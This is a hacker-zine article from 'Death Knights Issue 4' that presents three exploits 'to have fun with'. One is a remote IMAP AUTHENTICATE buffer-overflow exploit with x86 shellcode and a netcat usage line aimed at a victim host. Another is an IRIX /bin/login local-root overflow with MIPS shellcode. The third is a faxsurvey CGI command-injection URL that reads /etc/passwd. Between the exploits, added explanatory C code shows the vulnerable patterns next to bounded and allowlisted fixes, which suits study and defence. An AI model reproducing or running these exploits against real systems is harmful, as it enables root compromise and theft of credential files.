
Exploits - CGI & Stuff

Death Knights Issue 4


by ReNeGaDe

One more for you! To attempt an exploit it is better to have an account on your target (when possible). Here are a few exploits for you to have fun with, and also the faxsurvey CGI hole for grabbing the passwd file.


1) Exploit for the new imap bug.

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx------- 

/*
* Here goes another imap remote exploit
* The Death Knights www.deathknights.com
* by ReNeGaDe - ReNeGaDe@DeathKnights.com
*
* hey kiddies, it's 4 linux ! :)
* play around but be nice and careful - test it only against your own machine
* this code is only for educational purpose.
*
* renegade:~# (./imaprulez 100; cat) | nc victim.org 143
* (you can provide an offset or use the default 100)
*
* thanks for c0nd0r - condor@uground.org
*
* this code is heavily based on Cheez Whiz code
* So give him the credit : cheezbeast@hotmail.com
* I just found out the esp and fix things up
*
*/


#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>

#define BUFLEN (2*1024)   /* size of the literal sent after AUTHENTICATE */
#define NOP 0x90          /* x86 nop, fills the sled */

/* Linux x86 execve("/bin/sh") shellcode; NUL-free so strlen() can measure it */
char shell[] =
"\xeb\x34\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07"
"\x89\x56\x0f\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x7f"
"\x20\x46\x01\x20\x46\x02\x20\x46\x03\x20\x46\x05\x20\x46\x06"
"\xb0\x3b\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xc7\xff\xff\xff"
"\x2f\xe2\xe9\xee\x2f\xf3\xe8\x01\x01\x01\x01\x02\x02\x02\x02"
"\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

char buf[BUFLEN];
unsigned long int nop, esp;
long int offset;

int
main (int argc, char *argv[])
{
    int i;

    nop = 403; offset = 100;               /* defaults: sled length, esp offset */
    if (argc > 2) nop = atoi(argv[2]);
    if (argc > 1) offset = atoi(argv[1]);
    esp = 0xbffff501;                      /* stack address found on the test box */

    memset(buf, NOP, BUFLEN);              /* whole buffer starts as a nop sled */
    memcpy(buf+nop, shell, strlen(shell)); /* shellcode right after the sled */
    for (i = nop+strlen(shell); i < BUFLEN - 4; i += 4)
        *((int *) &buf[i]) = esp + offset; /* rest: guessed return address, repeated */

    printf("* AUTHENTICATE {%d}\r\n", BUFLEN);  /* announce a 2048-byte literal */
    for (i = 0; i < BUFLEN; i++)
        putchar(buf[i]);
    printf("\r\n");

    return 0;
}

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
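The exploit above sends a single command line, `* AUTHENTICATE {2048}`, followed by 2048 bytes of literal: a nop sled, the shellcode, and the guessed stack address repeated to the end. The `; cat` in the usage line keeps stdin open so commands can be typed to the shell the payload spawns. What makes the literal dangerous is how the server treats the count in braces. The following is an added example, my code and not the article's or imapd's source, showing that pattern in simplified form: a literal-length parser, the unchecked copy into a fixed stack buffer that the exploit relies on, and a bounded version that refuses the literal before reading it. AUTH_BUF and the return codes are assumptions.

```c
#include <errno.h>
#include <limits.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not the article's exploit and not imapd's source: a
 * simplified server-side handler for an IMAP literal. The client announces
 * a literal as "{N}\r\n" and the server then reads N raw bytes; the bug the
 * exploit relies on is copying those N bytes into a fixed buffer without
 * comparing N to the buffer size. AUTH_BUF is a hypothetical size. */

#define AUTH_BUF 1024

/* Extract N from the "{N}" marker that ends a command line.
 * Returns -1 for a missing or malformed marker (sign, spaces, junk). */
long imap_literal_length(const char *line)
{
    const char *open = strrchr(line, '{');
    char *end;
    unsigned long n;

    if (open == NULL || open[1] < '0' || open[1] > '9')
        return -1;
    errno = 0;
    n = strtoul(open + 1, &end, 10);
    if (errno != 0 || *end != '}' || n > LONG_MAX)
        return -1;
    return (long)n;
}

/* Vulnerable pattern: trust N and memcpy it into the stack buffer. With the
 * exploit's "{2048}" this writes 1024 bytes past auth[] and over the saved
 * return address, which is what the repeated esp+offset words target.
 * The test below only calls it with a literal that fits. */
int unchecked_read_literal(const char *cmdline, const unsigned char *payload,
                           size_t payload_len)
{
    unsigned char auth[AUTH_BUF];
    long n = imap_literal_length(cmdline);

    if (n < 0)
        return -1;
    if (payload_len < (size_t)n)
        return -3;                          /* client sent too little */
    memcpy(auth, payload, (size_t)n);       /* BUG: n never checked against AUTH_BUF */
    return (int)n;
}

/* Bounded pattern: reject an oversize literal before reading a byte of it
 * (a real server would answer NO and drop the connection or the literal). */
int bounded_read_literal(const char *cmdline, const unsigned char *payload,
                         size_t payload_len, unsigned char *out, size_t outcap)
{
    long n = imap_literal_length(cmdline);

    if (n < 0)
        return -1;                          /* malformed marker */
    if ((size_t)n > outcap)
        return -2;                          /* would overflow: refuse up front */
    if (payload_len < (size_t)n)
        return -3;
    memcpy(out, payload, (size_t)n);
    return (int)n;
}
```

The fix is the single comparison of the announced length against the destination size, made before any copy; everything else in the two functions is the same.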

2) A buffer overflow for you! In /bin/login.

What happens: local users can get root access. Vulnerable systems: Irix 5.3, Irix64 6.2, Irix 6.3.
Temporary fix: chmod u-s /bin/login
Compile the exploit with the '-n32' flag when building under 6.x

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx------- 

/* /bin/login exploit by DCRH 24/5/97
*
* The Death Knights www.deathknights.com
* by ReNeGaDe - ReNeGaDe@DeathKnights.com
*
* Tested on: R3000 Indigo (Irix 5.3)
* R4400 Indy (Irix 5.3)
* R5000 O2 (Irix 6.3)
* R8000 Power Challenge (Irix 6.2)
*
* Compile as: cc -n32 login.c (for Irix 6.x)
* cc login.c (for Irix 5.x)
*
* Press enter when prompted for a password
*
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH 200          /* nop sled + shellcode */
#define EXTRA 300               /* return-address spray after it */
#define OFFSET 0x1b0            /* guessed distance from our sp to the target */
#define IRIX_NOP 0x03e0f825     /* move $ra,$ra */

#define u_long unsigned

/* tiny routine called through a function pointer to read $sp */
u_long get_sp_code[] = {
    0x03a01025, /* move $v0,$sp */
    0x03e00008, /* jr $ra */
    0x00000000, /* nop */
};

/* MIPS execve("/bin/sh") shellcode; NUL-free so strlen() can measure it */
u_long irix_shellcode[] = {
    0x24041234, /* li $4,0x1234 */
    0x2084edcc, /* sub $4,0x1234 */
    0x0491fffe, /* bgezal $4,pc-4 */
    0x03bd302a, /* sgt $6,$sp,$sp */
    0x23e4012c, /* addi $4,$31,264+36 */
    0xa086feff, /* sb $6,-264+7($4) */
    0x2084fef8, /* sub $4,264 */
    0x20850110, /* addi $5,$4,264+8 */
    0xaca4fef8, /* sw $4,-264($5) */
    0xaca6fefc, /* sw $4,-260($5) */
    0x20a5fef8, /* sub $5, 264 */
    0x240203f3, /* li $v0,1011 */
    0x03ffffcc, /* syscall 0xfffff */
    0x2f62696e, /* "/bin" */
    0x2f7368ff, /* "/sh" */
};

char buf[BUF_LENGTH + EXTRA + 8];

int main(int argc, char **argv)
{
    char *env[] = {NULL};                   /* run login with an empty environment */
    u_long targ_addr, stack;
    u_long *long_p;
    int i, code_length = strlen((char *)irix_shellcode)+1;
    u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;

    stack = get_sp();

    long_p =(u_long *) buf;
    targ_addr = stack + OFFSET;

    if (argc > 1)
        targ_addr += atoi(argv[1]);         /* optional extra offset */

    /* the argument travels as a C string, so no byte of the address may be zero */
    while ((targ_addr & 0xff000000) == 0 ||
           (targ_addr & 0x00ff0000) == 0 ||
           (targ_addr & 0x0000ff00) == 0 ||
           (targ_addr & 0x000000ff) == 0)
        targ_addr += 4;

    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
        *long_p++ = IRIX_NOP;               /* nop sled */

    for (i = 0; i < code_length/sizeof(u_long); i++)
        *long_p++ = irix_shellcode[i];

    /* rotated by one byte because the string handed to login starts at &buf[1] */
    for (i = 0; i < EXTRA / sizeof(u_long); i++)
        *long_p++ = (targ_addr << 24) | (targ_addr >> 8);

    *long_p = 0;

    printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr);

    execle("/bin/login", "login", "-h", &buf[1], (char *)0, env);
    perror("execl failed");
    return 1;
}

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
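Two lines of the exploit above are easy to read past: the while loop that bumps targ_addr until none of its four bytes is zero, and the `(targ_addr << 24) | (targ_addr >> 8)` rotation. The argument reaches login as a C string, so a zero byte would end it early, and the string starts at &buf[1], one byte past the word boundary the address words were stored on. The added example below (my code, not DCRH's or the article's) lays the words out in an explicit big-endian byte buffer, as the MIPS machines listed would, and reads them back through the shifted view to show that every complete aligned word in the string is the original address, while the same spray without the rotation never lines up.

```c
#include <stddef.h>
#include <stdint.h>

/* Added example, not the article's or DCRH's code: why the /bin/login
 * exploit skips addresses containing a zero byte and rotates each address
 * word before storing it. Memory is modelled as an explicit big-endian
 * byte array, as on the MIPS boxes listed, so the result does not depend
 * on the host CPU. */

/* The exploit's search loop: step by 4 until no byte of the address is
 * 0x00, because the buffer reaches login as a C string and a NUL would
 * cut the spray short. */
uint32_t nul_free_address(uint32_t addr)
{
    while ((addr & 0xff000000u) == 0 || (addr & 0x00ff0000u) == 0 ||
           (addr & 0x0000ff00u) == 0 || (addr & 0x000000ffu) == 0)
        addr += 4;
    return addr;
}

/* The exploit's (targ_addr << 24) | (targ_addr >> 8): rotate right one byte. */
uint32_t rotate_for_shift(uint32_t addr)
{
    return (addr << 24) | (addr >> 8);
}

/* Big-endian store/load, what "*long_p++ = w" does on MIPS. */
static void store_be32(unsigned char *p, uint32_t w)
{
    p[0] = (unsigned char)(w >> 24);
    p[1] = (unsigned char)(w >> 16);
    p[2] = (unsigned char)(w >> 8);
    p[3] = (unsigned char)w;
}

static uint32_t load_be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Write nwords copies of addr at word-aligned offsets of buf, rotated as
 * the exploit does when rotate != 0, or unrotated for comparison. */
void fill_addresses(unsigned char *buf, size_t nwords, uint32_t addr, int rotate)
{
    size_t i;
    uint32_t w = rotate ? rotate_for_shift(addr) : addr;

    for (i = 0; i < nwords; i++)
        store_be32(buf + 4 * i, w);
}

/* Read the string login actually receives, &buf[1], at its own word
 * boundaries and count the words equal to addr. With the rotation every
 * complete word matches; without it the address is off by one byte. */
size_t count_aligned_hits(const unsigned char *buf, size_t nwords, uint32_t addr)
{
    const unsigned char *arg = buf + 1;     /* execle(..., "-h", &buf[1], ...) */
    size_t hits = 0, i;

    for (i = 0; i + 1 < nwords; i++)        /* the last word lacks its 4th byte */
        if (load_be32(arg + 4 * i) == addr)
            hits++;
    return hits;
}
```

The same reasoning applies whenever an overflow goes through a string copy: the overwriting address must contain no NUL byte, and its byte order has to be chosen for the alignment the victim's buffer ends up with, not the alignment of the buffer you built it in.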

3) CGI hole in the 'faxsurvey' CGI script...

"http://vitima.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd"
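The URL above carries the whole attack: everything after the '?' is URL-decoded by the web server and, in this script, ends up being handed to a shell, so `/bin/cat%20/etc/passwd` becomes `/bin/cat /etc/passwd` and runs with the web server's privileges. As an added example (my code; the original faxsurvey script is not reproduced here, and the parameter meaning, SURVEY_DIR and the allowlist are assumptions), here is the pattern in C: the decoder, the word-splitting that turns the decoded query into a command, and a hardened handler that allowlists the parameter and builds a fixed argv for execv() so no shell ever parses client bytes.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not faxsurvey itself: the CGI command-injection pattern
 * behind the URL above, beside a hardened handler. That the parameter is
 * meant to be a numeric survey id and that the action is "cat one file
 * under SURVEY_DIR" are assumptions made so the fix has something concrete
 * to allowlist. */

#define SURVEY_DIR "/var/spool/fax/survey/"   /* hypothetical location */

/* Decode %XX escapes and '+' into the raw bytes the script receives.
 * Returns the decoded length, or -1 on a bad escape or a too-small buffer. */
int url_decode(const char *in, char *out, size_t outcap)
{
    size_t o = 0;

    while (*in) {
        if (o + 1 >= outcap)
            return -1;
        if (*in == '%') {
            char hex[3];
            if (!isxdigit((unsigned char)in[1]) || !isxdigit((unsigned char)in[2]))
                return -1;
            hex[0] = in[1]; hex[1] = in[2]; hex[2] = 0;
            out[o++] = (char)strtol(hex, NULL, 16);
            in += 3;
        } else if (*in == '+') {
            out[o++] = ' ';
            in++;
        } else {
            out[o++] = *in++;
        }
    }
    out[o] = 0;
    return (int)o;
}

/* Vulnerable pattern: an unquoted $1 in a shell script (or the decoded
 * query spliced into a system() string) is word-split and executed, so
 * "/bin/cat /etc/passwd" becomes the command /bin/cat with /etc/passwd as
 * its argument. This function only shows the split; it runs nothing. */
int split_words(char *decoded, char *words[], int max)
{
    int n = 0;
    char *tok = strtok(decoded, " \t\n");

    while (tok != NULL && n < max) {
        words[n++] = tok;
        tok = strtok(NULL, " \t\n");
    }
    return n;
}

/* Hardened, step 1: the only thing accepted from the client is a short,
 * all-digit survey id. Anything else (paths, spaces, ';', '|') is rejected. */
int is_valid_survey_id(const char *s)
{
    size_t n = strlen(s);

    if (n == 0 || n > 8)
        return 0;
    for (; *s; s++)
        if (!isdigit((unsigned char)*s))
            return 0;
    return 1;
}

/* Hardened, step 2: build a fixed argv for execv(), so no shell parses
 * client bytes. Fills argv[] (argv[1] points into path) and returns 0,
 * or -1 if the parameter is rejected. */
int safe_argv(const char *query, char *path, size_t pathcap, char *argv[3])
{
    char decoded[256];

    if (url_decode(query, decoded, sizeof decoded) < 0)
        return -1;
    if (!is_valid_survey_id(decoded))
        return -1;
    if (snprintf(path, pathcap, SURVEY_DIR "%s", decoded) >= (int)pathcap)
        return -1;
    argv[0] = "/bin/cat";
    argv[1] = path;
    argv[2] = NULL;
    return 0;
}
```

The argv from safe_argv() is meant for fork() followed by execv(argv[0], argv); the important property is that the client-controlled bytes only ever appear as one argument of a fixed program, never on a command line a shell reads.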

That's it folks, my articles in this TDK end here!

If you want to clear up doubts or bring new ideas, here is my email. But no nonsense, folks, let's use some common sense, because I am not idle.

cya l8er!

ReNeGaDe               renegade@deathknights.com 
`'`'`'`' `'`'`'`'`'`'`'`'`'`'`'`'`
